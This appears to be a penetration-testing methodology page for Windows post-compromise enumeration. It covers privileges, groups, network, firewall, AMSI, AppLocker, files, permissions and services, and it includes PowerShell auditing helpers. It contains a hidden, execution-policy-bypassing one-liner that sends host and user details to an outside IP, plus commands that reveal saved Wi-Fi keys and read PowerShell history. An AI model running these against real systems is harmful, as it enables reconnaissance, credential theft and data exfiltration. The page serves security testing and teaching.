Windows
:::tip Page format
The procedure is described in Russian. The methodology keeps the headings (common terms are partly localized), tables, illustrations and code blocks: commands and parameters are in English, and syntax is not translated.
:::
Procedure
- Consolidate the current level of access and gather context (OS, network, domain).
- Minimize noise: avoid unnecessary actions outside the scope.
- Document commands and their output for the report.
- Below are the headings and example commands in English.
Methodology
General information exfiltration
C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -nop -w hidden -c iwr -UseBasicParsing -Uri "http://10.10.10.4/index.html?h=$(hostname)?x64=$([Environment]::Is64BitProcess)?u=$($env:USERNAME)?cd=$(Get-Location)?ip=$((Test-Connection -ComputerName (hostname) -Count 1).IPV4Address.IPAddressToString)?clm=$($ExecutionContext.SessionState.LanguageMode)?AppLockerS=$(Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status)?AppLockerR=$(Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String)"
PowerShell History
c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
User and group enumeration
whoami
echo %username%
Privileges
whoami /all
whoami /priv
Groups
net localgroup
net localgroup "<Group>"
# View Domain Groups
net group "<Group>" /domain
Operating system
wmic os get osarchitecture
ver
systeminfo
cmd /c set
# Returns the domain name
echo %USERDOMAIN%
systeminfo | findstr /B /C:"Domain"
Get-WMIObject Win32_ComputerSystem | Select-Object Name, Domain
Network enumeration
C:\Users\Marmeus>type C:\Windows\System32\drivers\etc\hosts
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
netstat -ano
route print
ipconfig /all
net share
net1 share
Get-SmbServerConfiguration | select EnableSecuritySignature
net view
Firewall status
Deprecated command
# Check if Windows Defender is enabled
Get-MpComputerStatus
# Check if the firewall is enabled
Get-NetFirewallProfile | Select-Object Name,Enabled
# Allowed Firewall Ports
Get-NetFirewallRule | Get-NetFirewallPortFilter | Where-Object { $_.Protocol -eq 'TCP' -and $_.LocalPort -ne 'Any' }
# Blocked ports/applications
Get-NetFirewallRule -PolicyStore ActiveStore | where {$_.Action -eq "Block"}
1. netsh wlan show profile
2. netsh wlan show profile name=<ProfileName> key=clear
arp -a
Constrained Language Mode (CLM)
$ExecutionContext.SessionState.LanguageMode
# If CLM is enabled, these calls fail
[Math]::Cos(1)
[System.Console]::WriteLine("ConstrainedModeTest")
AMSI
# Alternative 1
'amsiutils'
'amsicontext'
'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'
'Invoke-Mimikatz'
# Alternative 2
set-content .\ADS_Test.txt:EICAR 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
AppLocker
Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-ExecutionPolicy -List | Format-Table -AutoSize
Files Enumeration
PowerShell History
type c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
Disks
# CMD (run inside diskpart)
list volume
# PowerShell
c:\Users>powershell -c get-psdrive -psprovider filesystem
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
C 19,69 9,70 FileSystem C:\ Users
W 2,52 17,48 FileSystem W:\
Alternate Data Streams
dir /r
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
echo payaso | set-content -path .\prueba.txt -stream hidden
echo pepe > prueba.txt:pepe
gc -path .\prueba.txt -stream hidden
more < prueba.txt:hidden
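The one-liners above show individual streams; as an added example (not part of the original page), the function below walks a directory tree, skips the default `:$DATA` stream, and returns every other stream as an object so the result can be filtered or exported. It assumes PowerShell 5.1 or later on an NTFS volume; the function name, the `-IncludeZoneIdentifier` switch and the demo folder are this example's own choices.

```powershell
# Added example (not from the original page): enumerate non-default NTFS alternate data
# streams below a directory and return them as objects. Assumes PowerShell 5.1+ on NTFS;
# the function name and the -IncludeZoneIdentifier switch are this example's own.
function Get-AlternateDataStream {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,
        # Zone.Identifier is the routine "Mark of the Web" stream; hidden by default to reduce noise
        [switch] $IncludeZoneIdentifier
    )

    # Only files carry the streams of interest; directories are skipped (-File)
    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # "-Stream *" lists every stream of the file, including the unnamed default ':$DATA'
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object {
                    $_.Stream -ne ':$DATA' -and
                    ($IncludeZoneIdentifier -or $_.Stream -ne 'Zone.Identifier')
                } |
                ForEach-Object {
                    [pscustomobject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Bytes  = $_.Length
                    }
                }
        }
}

# Usage: build a demo folder with one file that carries a named stream, then find it
$dir = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
Set-Content -Path (Join-Path $dir 'note.txt') -Value 'visible content'
Set-Content -Path (Join-Path $dir 'note.txt') -Stream 'hidden' -Value 'content not shown by dir'
Get-AlternateDataStream -Path $dir | Format-Table -AutoSize
```

Streams other than `Zone.Identifier` on user-writable paths are rare on a clean host, so a short result list is easy to review by hand; pipe the output to `Export-Csv` to keep it with the report.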
Permissions
# Directory permissions
Get-Acl C:\backup\Scripts\* | Format-Table -Wrap -AutoSize
# Directory / File permissions
icacls "<Path>"
Simple Rights
| Mask | Permission |
|---|---|
| F | Full access |
| M | Modify access |
| RX | Read and execute access |
| R | Read-only access |
| W | Write-only access |
Specific Rights
| Mask | Permission |
|---|---|
| D | Delete |
| RC | Read control |
| WDAC | Write DAC |
| WO | Write Owner |
| S | Synchronize |
| AS | Access System security |
| MA | Maximum Allowed |
| GR | Generic Read |
| GW | Generic Write |
| GE | Generic Execute |
| GA | Generic All |
| RD | Read Data / List Directory |
| WD | Write Data / Add File |
| AD | Append Data / Add subdirectory |
| REA | Read Extended Attributes |
| WEA | Write Extended Attributes |
| X | Execute |
| DC | Delete Child |
| RA | Read Attributes |
| WA | Write Attributes |
Inheritance rights (applied only to directories)
| Mask | Permission |
|---|---|
| OI | Object Inherit |
| CI | Container Inherit |
| IO | Inherit Only |
| NP | Do not propagate inherit |
| I | Permission inherited from parent container |
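Reading `icacls` output by eye is error-prone on large trees. As an added example (not part of the original page), the function below parses that output into objects using the mask tables above and marks allow entries that grant write-class rights to broad groups. The `icacls` output shown is constructed for this example, and the function, parameter and variable names are this example's own.

```powershell
# Added example (not from the original page): parse icacls output into objects using the
# mask tables above and flag write-class rights granted to broad groups. Sample output is
# constructed; function and variable names are this example's own.
$InheritanceMasks = 'OI', 'CI', 'IO', 'NP', 'I'
$WriteClassMasks  = 'F', 'M', 'W', 'WD', 'AD', 'D', 'DC', 'WDAC', 'WO', 'GW', 'GA'
$BroadPrincipals  = '^(Everyone|BUILTIN\\Users|NT AUTHORITY\\(Authenticated Users|INTERACTIVE)|.*\\Domain Users)$'

function ConvertFrom-IcaclsOutput {
    param(
        [Parameter(Mandatory)] [string]   $Path,   # the path icacls was run against
        [Parameter(Mandatory)] [string[]] $Lines   # raw icacls output lines
    )
    foreach ($line in $Lines) {
        $text = $line.Trim()
        # The first line carries the path in front of the first ACE; drop it
        if ($text.StartsWith($Path, [System.StringComparison]::OrdinalIgnoreCase)) {
            $text = $text.Substring($Path.Length).Trim()
        }
        # ACE lines look like  PRINCIPAL:(flag)(flag)(rights); anything else is skipped
        if (-not ($text -match '^(?<principal>[^:]+):(?<aces>(?:\([^()]*\))+)$')) { continue }
        $principal = $Matches['principal']
        $aces      = $Matches['aces']
        $inherit = @(); $rights = @(); $deny = $false
        foreach ($m in [regex]::Matches($aces, '\(([^()]*)\)')) {
            $token = $m.Groups[1].Value
            if     ($token -eq 'DENY')                  { $deny = $true }
            elseif ($InheritanceMasks -contains $token) { $inherit += $token }
            else   { $rights += $token -split ',' }      # simple or specific rights, e.g. (M) or (RD,WD,X)
        }
        [pscustomobject]@{
            Path        = $Path
            Principal   = $principal
            Deny        = $deny
            Inheritance = $inherit -join ','
            Rights      = $rights -join ','
            # Allow ACE that grants a write-class mask to a broad group: worth a closer look
            Review      = (-not $deny) -and
                          ($principal -match $BroadPrincipals) -and
                          (@($rights | Where-Object { $WriteClassMasks -contains $_ }).Count -gt 0)
        }
    }
}

# Constructed sample of what "icacls C:\backup\Scripts" prints (not captured from a real host)
$sample = @'
C:\backup\Scripts NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                  BUILTIN\Administrators:(OI)(CI)(F)
                  BUILTIN\Users:(OI)(CI)(RX)
                  Everyone:(OI)(CI)(M)
                  CONTOSO\svc-backup:(I)(OI)(CI)(RD,WD,X)
                  CONTOSO\guest:(DENY)(RX)

Successfully processed 1 files; Failed processing 0 files
'@ -split "`r?`n"

ConvertFrom-IcaclsOutput -Path 'C:\backup\Scripts' -Lines $sample | Format-Table -AutoSize
# Live use: ConvertFrom-IcaclsOutput -Path 'C:\backup\Scripts' -Lines (icacls 'C:\backup\Scripts')
```

In the sample only the `Everyone:(OI)(CI)(M)` entry is marked for review: `M` includes write and delete, and the `(OI)(CI)` flags push it down to every file and subdirectory. Deny entries are reported but never flagged, since they restrict rather than grant access.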
Service rights
| Mask | Permission | Meaning |
|---|---|---|
| CC | SERVICE_QUERY_CONFIG | Ask the SCM for the service's current configuration |
| LC | SERVICE_QUERY_STATUS | Ask the SCM for the service's current status |
| SW | SERVICE_ENUMERATE_DEPENDENTS | List dependent services |
| LO | SERVICE_INTERROGATE | Ask the service for its current status |
| CR | SERVICE_USER_DEFINED_CONTROL | Send a service control defined by the service's author |
| RC | READ_CONTROL | Read the security descriptor of this service |
| RP | SERVICE_START | Start the service |
| WP | SERVICE_STOP | Stop the service |
| DT | SERVICE_PAUSE_CONTINUE | Pause or continue the service |
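The two-letter masks in this table are the ones that appear in a service's SDDL string, which is what `sc.exe sdshow <ServiceName>` prints. As an added example (not part of the original page), the function below decodes such a string, names each right with the table above, and reports which principals can start/stop or reconfigure the service. The SDDL shown is constructed for this example; the function and variable names are this example's own.

```powershell
# Added example (not from the original page): decode a service DACL from its SDDL string
# (as printed by "sc.exe sdshow <ServiceName>") using the service-right letters above.
# The sample SDDL is constructed; function and variable names are this example's own.
$ServiceRightNames = @{
    CC = 'SERVICE_QUERY_CONFIG';  LC = 'SERVICE_QUERY_STATUS'; SW = 'SERVICE_ENUMERATE_DEPENDENTS'
    LO = 'SERVICE_INTERROGATE';   CR = 'SERVICE_USER_DEFINED_CONTROL'; RC = 'READ_CONTROL'
    RP = 'SERVICE_START';         WP = 'SERVICE_STOP';         DT = 'SERVICE_PAUSE_CONTINUE'
    DC = 'SERVICE_CHANGE_CONFIG'; WD = 'WRITE_DAC';            WO = 'WRITE_OWNER'
    SD = 'DELETE';                GA = 'GENERIC_ALL'
}
# Well-known SID abbreviations seen in service DACLs. Note that "WD" means WRITE_DAC in the
# rights field but Everyone in the SID field; SDDL uses the same letters in both positions.
$SidAliases = @{
    SY = 'NT AUTHORITY\SYSTEM';  BA = 'BUILTIN\Administrators'; AU = 'NT AUTHORITY\Authenticated Users'
    IU = 'NT AUTHORITY\INTERACTIVE'; SU = 'NT AUTHORITY\SERVICE'; WD = 'Everyone'; BU = 'BUILTIN\Users'
}

function ConvertFrom-ServiceSddl {
    param([Parameter(Mandatory)] [string] $Sddl)
    # Keep the DACL only: everything before the SACL marker "S:" (ACE bodies never contain ':')
    $dacl = ($Sddl -split 'S:')[0]
    # ACE layout: (type;flags;rights;object_guid;inherit_guid;sid)
    $acePattern = '\((?<type>[^;]*);(?<flags>[^;]*);(?<rights>[^;]*);[^;]*;[^;]*;(?<sid>[^)]+)\)'
    foreach ($m in [regex]::Matches($dacl, $acePattern)) {
        $raw = $m.Groups['rights'].Value
        # Rights are two-letter codes run together, or a raw hex access mask
        $codes = if ($raw -like '0x*') { @($raw) } else { [regex]::Matches($raw, '..') | ForEach-Object { $_.Value } }
        $sid   = $m.Groups['sid'].Value
        $allow = $m.Groups['type'].Value -eq 'A'
        [pscustomobject]@{
            Access         = if ($allow) { 'Allow' } else { 'Deny' }
            Principal      = if ($SidAliases.ContainsKey($sid)) { $SidAliases[$sid] } else { $sid }
            Rights         = ($codes | ForEach-Object { if ($ServiceRightNames.ContainsKey($_)) { $ServiceRightNames[$_] } else { $_ } }) -join ', '
            CanStartStop   = $allow -and (@($codes | Where-Object { $_ -in 'RP', 'WP', 'DT', 'GA' }).Count -gt 0)
            CanReconfigure = $allow -and (@($codes | Where-Object { $_ -in 'DC', 'WD', 'WO', 'GA' }).Count -gt 0)
        }
    }
}

# Constructed SDDL (not captured from a real host). The fifth ACE gives every authenticated
# user start, stop and change-config rights, which is the kind of entry an audit should surface.
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;RPWPDC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
ConvertFrom-ServiceSddl -Sddl $sample | Format-Table -AutoSize
# Live use: ConvertFrom-ServiceSddl -Sddl ((sc.exe sdshow <ServiceName>) -join '')
```

For the sample, SYSTEM and Administrators come out with `CanStartStop` set (Administrators also with `CanReconfigure`), INTERACTIVE and SERVICE with neither, and Authenticated Users with both, which is the entry to record and raise. `sc.exe sdshow` prints an empty first line before the SDDL, hence the `-join ''` in the live-use call.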
List Installed HotFixes
Get-Hotfix
Running processes
tasklist
Scheduled Tasks
(Get-ScheduledTask [-TaskName '<TASK_NAME>']).Actions
# List scheduled tasks under Users folder
Get-ScheduledTask -TaskPath "\Users\*"
# List specific information on specified Tasks
Get-ScheduledTaskInfo -TaskName <Full Path>